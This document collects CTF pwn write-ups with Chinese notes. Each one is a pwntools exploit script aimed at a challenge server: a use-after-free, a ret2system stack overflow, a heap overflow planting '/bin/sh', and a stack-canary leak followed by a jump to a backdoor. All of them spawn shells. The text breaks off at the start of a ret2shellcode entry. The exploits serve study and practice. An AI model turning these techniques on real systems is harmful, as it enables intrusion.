[NISACTF 2022]UAF
from pwn import *
# DEBUG-level logging makes pwntools print every byte exchanged with the
# target, which is how the menu interaction below was worked out.
context(log_level='DEBUG')
# Local-binary alternative: io = process('./pwnuaf')
io = remote('1.14.71.254', 28905)
# Loaded for symbol lookup; not referenced by the rest of this script.
elf = ELF('./pwnuaf')
def _add_note():
    """Pick menu option 1 (add a note) once the ':' prompt has arrived."""
    io.sendlineafter(":", "1")
def _edit_note(id, content):
    """Menu option 2: overwrite the note on page *id* with *content*.

    Every answer is sent only after the program's own prompt has been
    read, so the exchange stays in lock-step with the menu.
    """
    io.sendlineafter(":", "2")
    io.sendlineafter("Input page\n", str(id))
    io.sendlineafter("Input your strings\n", content)
def _delete_note(id):
    """Menu option 3: delete the note on page *id*.

    Per the author's note below the script, the program frees the note
    but leaves its pointer in place, which is the bug the script relies on.
    """
    io.sendlineafter(":", "3")
    io.sendlineafter("Input page\n", str(id))
def _show_note(id):
    """Menu option 4: ask the program to show page *id*.

    Consumes output up to the 'show\\n' marker so the caller is positioned
    right after the program's reply.
    """
    io.sendlineafter(":", "4")
    io.sendlineafter("Input page\n", str(id))
    io.recvuntil("show\n")
#gdb.attach(io,"^C")
#pause()
# Order matters here (see the author's note below the script): page 0 is
# allocated and freed, then a second allocation reuses the same storage as
# page 1. Because delete does not clear the page-0 pointer, pages 0 and 1
# now alias one chunk (use-after-free). On the program side the fix is to
# null the pointer after free() and refuse operations on freed pages.
_add_note()
_delete_note(0)
_add_note()
# Value the author stores into the recycled chunk; how the binary uses it
# is not shown on this page.
nico = 0x08048642
payload = b"sh\x00\x00" + p32(nico)
#payload = b"/bin/sh\x00" + p32(nico)
# Write through page 1, then act on page 0: the dangling page-0 pointer
# sees the data written via page 1.
_edit_note(1,payload)
#gdb.attach(io,"^C")
_show_note(0)
io.interactive()
流程：先添加 note 0，再删除 note 0，再添加 note 1 并修改 note 1 内容为 payload。note 1 所在地址空间实则为 note 0 所在位置（free 后指针没有置为 null，存在 UAF 漏洞）。
[HNCTF 2022 Week1]ezr0p32
from pwn import *
context(os='linux', arch='i386', log_level='debug')
elf = ELF('./ezr0p')
p=remote('node1.anna.nssctf.cn',28351)
#p = process('./ezr0p')
# system's address comes straight from the binary's symbol table, so no
# runtime leak is needed (no PIE/ASLR on the binary is implied by this).
sys_addr=elf.symbols['system']
# Distance from the overflowed buffer to the saved return address;
# presumably 0x1c bytes of buffer plus 4 bytes of saved ebp — TODO confirm.
offset=0x1c+0x04
# .bss address where the program presumably keeps the string sent first
# — verify against the binary.
addr_bss=0x0804A080
p.recv()
p.send('/bin/sh\x00')
p.recvuntil('time~')
# i386 ret2system layout: padding, system(), a fake return address
# (0xdeedbeef, never meant to be reached), then system's argument pointer.
# Any of stack canaries, PIE or a bounds-checked read would defeat this.
payload=b'a'*offset+p32(sys_addr)+p32(0xdeedbeef)+p32(addr_bss)
p.sendline(payload)
p.interactive()
[NISACTF 2022]ezheap
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
#sh=process('./pwn')
sh=remote('node2.anna.nssctf.cn',28456)
#gdb.attach(sh)
#pause()
# Per the author's note below: the input overruns its heap chunk into the
# neighbouring one. The 0x18+0x08 filler presumably covers the rest of the
# current chunk's data plus the next chunk's 8-byte size field — TODO
# confirm with the binary's chunk layout. A length-checked read would
# stop the overflow at the chunk boundary.
payload=b'a'*(0x18+0x08)+b'/bin/sh\x00'
sh.sendlineafter('Input:',payload)
sh.interactive()
直接覆盖到下一个堆块
[HGAME 2022 week1]test your gdb
from pwn import *
context.log_level='debug'
#sh=process('./service')
sh=remote('node1.anna.nssctf.cn',28169)
elf=ELF('./service')
#gdb.attach(sh,'b *0x401378')
#pause()
# Two 8-byte constants recovered by debugging (author's note below): the
# binary compares the input against them at rbp-0x40, so sending them
# passes the check without re-implementing the decrypt step.
cmptext=p64(0xb0361e0e8294f147)+p64(0x8c09e0c34ed8a6a9)
sh.sendafter(b'word\n',cmptext)
# The program then presumably echoes stack memory: 0x18 bytes are skipped
# and the following 8 bytes are taken as the canary — confirm the read.
sh.recv(0x18)
canary = u64(sh.recv(8))
success(hex(canary))
# Stack overflow with the leaked canary replayed in place, 8 filler bytes
# (presumably the saved rbp), then the return address set to the binary's
# own 'b4ckd00r' symbol. Lesson: a canary only protects while it stays
# secret — the read-back above is what makes this overflow usable.
payload = b'a'*0x18 + p64(canary) + b'a'*8 + p64(elf.sym['b4ckd00r'])
sh.sendline(payload)
sh.interactive()
gdb直接断到0x401378
动调发现 rbp-0x40 位置有两个数进行比较，直接把这两个数调试出来，绕过 decrypt 的过程。
泄露canary之后正常打栈溢出就行
[HNCTF 2022 Week1]ret2shellcode
from pwn import *
context(arch &